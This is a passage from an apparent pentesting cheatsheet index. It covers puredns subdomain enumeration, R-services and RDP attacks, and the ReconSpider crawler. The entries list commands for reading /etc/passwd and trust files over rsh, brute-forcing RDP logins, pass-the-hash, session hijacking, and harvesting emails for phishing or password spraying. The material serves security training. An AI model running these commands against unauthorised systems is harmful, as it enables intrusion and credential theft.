1.1.1.1 # 1.0.0.1 # 9.9.9.9 Recommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt # Large wordlists — puredns handles them efficiently https://github.com/danielmiessler/SecLists https://github.com/trickest/wordlists # DNS-specific massive lists Pipeline Examples # Combine assetfinder results + puredns brute force assetfinder --subs-only example.com \u0026gt; passive.txt puredns bruteforce wordlist.txt example.com \\ -r resolvers.txt -w brute.txt cat passive.txt brute.txt | sort -u \u0026gt; all_subs.txt # Resolve large subdomain list from other tools amass enum -passive -d example.com | \\ puredns resolve - -r resolvers.txt -w resolved.txt # Full pipeline puredns bruteforce \\ /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ example.com \\ -r resolvers.txt \\ --resolvers-trusted trusted.txt \\ -l 500 \\ -w valid_subs.txt \\ -q Wildcard Handling puredns detects and filters wildcard DNS responses automatically. If *.example.com resolves to the same IP, it identifies the pattern and removes false positives from results — much more reliable than tools that ignore wildcard records.\nUse --resolvers-trusted with well-known public resolvers (e.g. 
8.8.8.8, 1.1.1.1) specifically for wildcard detection to avoid poisoned/untrustworthy public resolver results.\n","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/puredns/","summary":"","title":"puredns"},{"content":"R-Services Enumeration Cheatsheet Default Ports:\nrexec: 512 (TCP) rlogin: 513 (TCP) rsh / rcp: 514 (TCP) rpcbind / portmapper: 111 (TCP/UDP) Note: R-services transmit data in cleartext and rely on IP-based trust. They are largely obsolete but still found in legacy Unix/Linux environments.\nDetection nmap -p 512-514 \u0026lt;ip\u0026gt; nmap -p 512-514 -sV \u0026lt;ip\u0026gt; nmap -p 111 \u0026lt;ip\u0026gt; rlogin # Login as current user rlogin \u0026lt;ip\u0026gt; # Login as specific user rlogin -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; rsh (Remote Shell) # Execute command remotely rsh \u0026lt;ip\u0026gt; \u0026lt;command\u0026gt; rsh -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; whoami rsh -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; cat /etc/passwd rsh -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; /bin/bash rexec (Remote Exec) rexec \u0026lt;ip\u0026gt; -l \u0026lt;user\u0026gt; \u0026lt;command\u0026gt; rexec \u0026lt;ip\u0026gt; -l \u0026lt;user\u0026gt; id rpcbind / Portmapper (Port 111) # List all registered RPC services rpcinfo -p \u0026lt;ip\u0026gt; # List NFS mounts (if NFS is running) showmount -e \u0026lt;ip\u0026gt; # Nmap nmap -p 111 --script rpcinfo \u0026lt;ip\u0026gt; nmap -p 111 --script nfs-ls \u0026lt;ip\u0026gt; nmap -p 111 --script nfs-showmount \u0026lt;ip\u0026gt; nmap -p 111 --script nfs-statfs \u0026lt;ip\u0026gt; rwho / ruptime # List logged-in users across trusted hosts rwho # Show uptime across trusted hosts ruptime Trust Files (Critical Targets) These files define which hosts/users can connect without a password:\n# System-wide trust (any user from listed hosts) cat /etc/hosts.equiv # Per-user trust (~/.rhosts) cat ~/.rhosts cat 
/root/.rhosts # Format of trust files: # \u0026lt;hostname\u0026gt; — trust all users from this host # \u0026lt;hostname\u0026gt; \u0026lt;user\u0026gt; — trust specific user from this host # + + — trust EVERYONE (critical misconfiguration) Nmap Scripts nmap -p 512-514 --script rsh-brute \u0026lt;ip\u0026gt; nmap -p 111 --script rpcinfo \u0026lt;ip\u0026gt; nmap -p 111 --script nfs-ls,nfs-showmount,nfs-statfs \u0026lt;ip\u0026gt; Exploitation Flow 1. Scan for open ports 512-514 2. Check /etc/hosts.equiv and ~/.rhosts on any accessible system 3. If trusted host found, rlogin from that IP without password 4. Look for + + wildcard trust entries (full bypass) 5. If rsh available, execute commands directly ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/r-services/","summary":"","title":"R Services"},{"content":"RDP Enumeration Cheatsheet Default Port: 3389 (TCP)\nDetection \u0026amp; Info Gathering nmap -p 3389 -sV \u0026lt;ip\u0026gt; nmap -p 3389 --script rdp-enum-encryption \u0026lt;ip\u0026gt; nmap -p 3389 --script rdp-vuln-ms12-020 \u0026lt;ip\u0026gt; nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info \u0026lt;ip\u0026gt; Check NLA (Network Level Auth) # If NLA is required, credential prompt appears BEFORE full connection nmap -p 3389 --script rdp-enum-encryption \u0026lt;ip\u0026gt; # Look for: \u0026#34;Security 
layer: NLA\u0026#34; or \u0026#34;CredSSP\u0026#34; # rdp_check.py (impacket) — tests credential validity python3 rdp_check.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; Password Attacks # Hydra hydra -l \u0026lt;user\u0026gt; -P wordlist.txt rdp://\u0026lt;ip\u0026gt; hydra -L users.txt -P wordlist.txt rdp://\u0026lt;ip\u0026gt; hydra -l \u0026lt;user\u0026gt; -P wordlist.txt rdp://\u0026lt;ip\u0026gt; -t 4 # Limit threads (RDP is picky) # Crowbar crowbar -b rdp -s \u0026lt;ip\u0026gt;/32 -u \u0026lt;user\u0026gt; -C wordlist.txt crowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt # Metasploit use auxiliary/scanner/rdp/rdp_scanner set RHOSTS \u0026lt;ip\u0026gt; run Connecting via Linux # xfreerdp (recommended) xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /d:\u0026lt;domain\u0026gt; xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /drive:share,/tmp # Mount local dir xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /cert-ignore # Ignore cert errors xfreerdp /u:\u0026lt;user\u0026gt; /h:\u0026lt;nthash\u0026gt; /v:\u0026lt;ip\u0026gt; # Pass-the-Hash # rdesktop rdesktop \u0026lt;ip\u0026gt; rdesktop -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -d \u0026lt;domain\u0026gt; \u0026lt;ip\u0026gt; # Remmina (GUI) remmina -c rdp://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; Session Hijacking (Post-Exploitation) # List sessions (on Windows target) query session query user # Hijack disconnected session (as SYSTEM) tscon \u0026lt;session_id\u0026gt; /dest:\u0026lt;current_session\u0026gt; Key Vulnerabilities CVE Name Affected Systems Description CVE-2019-0708 BlueKeep Win7, WinXP, Server 2008 Pre-auth RCE via RDP CVE-2019-1181 DejaBlue Win8, Win10, Server 2012+ Pre-auth RCE via RDP CVE-2019-1182 DejaBlue Win8, Win10, 
Server 2012+ Pre-auth RCE via RDP CVE-2012-0002 MS12-020 Multiple DoS / potential code execution BlueKeep Check (Metasploit) use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set RHOSTS \u0026lt;ip\u0026gt; run Useful Options # Custom RDP port xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt; # Enable clipboard sharing xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; +clipboard # Full screen xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /f # Dynamic resolution xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /dynamic-resolution ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/rdp/","summary":"\u003ch1 id=\"rdp-enumeration-cheatsheet\"\u003eRDP Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 3389 (TCP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection--info-gathering\"\u003eDetection \u0026amp; Info Gathering\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3389\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3389\u003c/span\u003e --script rdp-enum-encryption \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3389\u003c/span\u003e --script rdp-vuln-ms12-020 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap 
-p \u003cspan style=\"color:#ae81ff\"\u003e3389\u003c/span\u003e --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"check-nla-network-level-auth\"\u003eCheck NLA (Network Level Auth)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# If NLA is required, credential prompt appears BEFORE full connection\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3389\u003c/span\u003e --script rdp-enum-encryption \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Look for: \u0026#34;Security layer: NLA\u0026#34; or \u0026#34;CredSSP\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# rdp_check.py (impacket) — tests credential validity\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 rdp_check.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"password-attacks\"\u003ePassword Attacks\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Hydra\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt rdp://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -L users.txt -P wordlist.txt rdp://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt rdp://\u0026lt;ip\u0026gt; -t \u003cspan style=\"color:#ae81ff\"\u003e4\u003c/span\u003e    \u003cspan style=\"color:#75715e\"\u003e# Limit threads (RDP is picky)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Crowbar\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrowbar -b rdp -s \u0026lt;ip\u0026gt;/32 -u \u0026lt;user\u0026gt; -C wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Metasploit\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/rdp/rdp_scanner\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset 
RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"connecting-via-linux\"\u003eConnecting via Linux\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# xfreerdp (recommended)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /d:\u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /drive:share,/tmp    \u003cspan style=\"color:#75715e\"\u003e# Mount local dir\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /cert-ignore          \u003cspan style=\"color:#75715e\"\u003e# Ignore cert errors\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /h:\u0026lt;nthash\u0026gt; /v:\u0026lt;ip\u0026gt;                     \u003cspan style=\"color:#75715e\"\u003e# Pass-the-Hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# rdesktop\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erdesktop \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erdesktop -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -d \u0026lt;domain\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Remmina (GUI)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eremmina -c rdp://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"session-hijacking-post-exploitation\"\u003eSession Hijacking (Post-Exploitation)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e# List sessions (on Windows target)\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003equery session\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003equery user\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e# Hijack disconnected session (as SYSTEM)\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003etscon \u0026lt;session_id\u0026gt; /dest:\u0026lt;current_session\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-vulnerabilities\"\u003eKey Vulnerabilities\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eCVE\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eName\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eAffected Systems\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2019-0708\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBlueKeep\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWin7, WinXP, Server 2008\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePre-auth RCE via RDP\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2019-1181\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDejaBlue\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWin8, Win10, Server 2012+\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePre-auth RCE via RDP\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2019-1182\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDejaBlue\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWin8, Win10, Server 2012+\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePre-auth RCE via RDP\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2012-0002\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMS12-020\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMultiple\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDoS / potential code execution\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"bluekeep-check-metasploit\"\u003eBlueKeep Check (Metasploit)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/rdp/cve_2019_0708_bluekeep\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"useful-options\"\u003eUseful Options\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Custom RDP port\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Enable clipboard sharing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; +clipboard\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Full 
screen\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /f\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Dynamic resolution\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /dynamic-resolution\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"RDP"},{"content":"ReconSpider Cheatsheet Type: Custom Scrapy-based web crawler that maps a target site and harvests links, emails, subdomains, external hosts, images, files, and metadata into a single JSON report\nInstallation # Download the spider (HTB Academy distribution) wget -O ReconSpider.zip \\ https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.06.zip unzip ReconSpider.zip # Requires Scrapy (and Python 3) pip3 install scrapy ReconSpider is a single Python script (ReconSpider.py) built on top of [[scrapy]]. There is no system package — it runs directly with python3.\nBasic Usage python3 ReconSpider.py \u0026lt;target_url\u0026gt; python3 ReconSpider.py https://example.com Results are written to results.json in the current directory.\nWhat It Collects Field Description emails Email addresses found in page content links Internal links discovered while crawling external_files Links to documents (PDF, DOCX, XLSX, etc.) 
js_files JavaScript files referenced by the site form_fields Input field names from HTML forms images Image URLs videos Video URLs audio Audio file URLs comments HTML comments left in the source Common Commands # Crawl a target (writes results.json) python3 ReconSpider.py https://example.com # Pretty-print the full report cat results.json | jq # Extract just the emails cat results.json | jq \u0026#39;.emails\u0026#39; # Extract all discovered internal links cat results.json | jq \u0026#39;.links[]\u0026#39; # Pull out referenced JavaScript files (good for further analysis) cat results.json | jq \u0026#39;.js_files[]\u0026#39; # List any external documents (PDFs, office files, etc.) cat results.json | jq \u0026#39;.external_files[]\u0026#39; # Show HTML comments (may leak dev notes / credentials) cat results.json | jq \u0026#39;.comments[]\u0026#39; # Grab form field names (useful for fuzzing later) cat results.json | jq \u0026#39;.form_fields[]\u0026#39; Parsing Output with jq # Count results per category cat results.json | jq \u0026#39;to_entries | map({key, count: (.value | length)})\u0026#39; # Unique subdomains hidden inside the link list cat results.json | jq -r \u0026#39;.links[]\u0026#39; \\ | sed -E \u0026#39;s#https?://([^/]+)/.*#\\1#\u0026#39; | sort -u # Build a target list of live JS files to feed into other tools cat results.json | jq -r \u0026#39;.js_files[]\u0026#39; \u0026gt; js_targets.txt Typical Workflow # 1. Crawl the target python3 ReconSpider.py https://inlanefreight.com # 2. Review the harvested data cat results.json | jq # 3. 
Pivot on findings: # - emails -\u0026gt; phishing / OSINT / password spraying lists # - js_files -\u0026gt; grep for API keys, endpoints, secrets # - comments -\u0026gt; developer notes, hidden paths # - form_fields -\u0026gt; input names for ffuf / parameter fuzzing # - links -\u0026gt; extract subdomains, feed to httprobe / nmap cat results.json | jq -r \u0026#39;.links[]\u0026#39; | sed -E \u0026#39;s#https?://([^/]+).*#\\1#\u0026#39; \\ | sort -u | httprobe Notes Active — ReconSpider sends live requests and crawls the target; stay within authorised scope. Output is always results.json in the working directory — rename it between runs to avoid overwriting. Built on [[scrapy]]; for finer control (depth limits, delays, custom selectors) drive Scrapy directly. The comments, js_files, and form_fields outputs are the highest-value findings for follow-up testing. Commonly featured in the HTB Academy Information Gathering – Web Edition module for site crawling. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/web-crawling/reconspider/","summary":"\u003ch1 id=\"reconspider-cheatsheet\"\u003eReconSpider Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Custom Scrapy-based web crawler that maps a target site and harvests links, emails, subdomains, external hosts, images, files, and metadata into a single JSON report\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Download the spider (HTB Academy distribution)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ewget -O ReconSpider.zip \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.06.zip\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eunzip ReconSpider.zip\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Requires Scrapy (and Python 3)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epip3 install scrapy\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003eReconSpider is a single Python script (\u003ccode\u003eReconSpider.py\u003c/code\u003e) built on top of [[scrapy]]. 
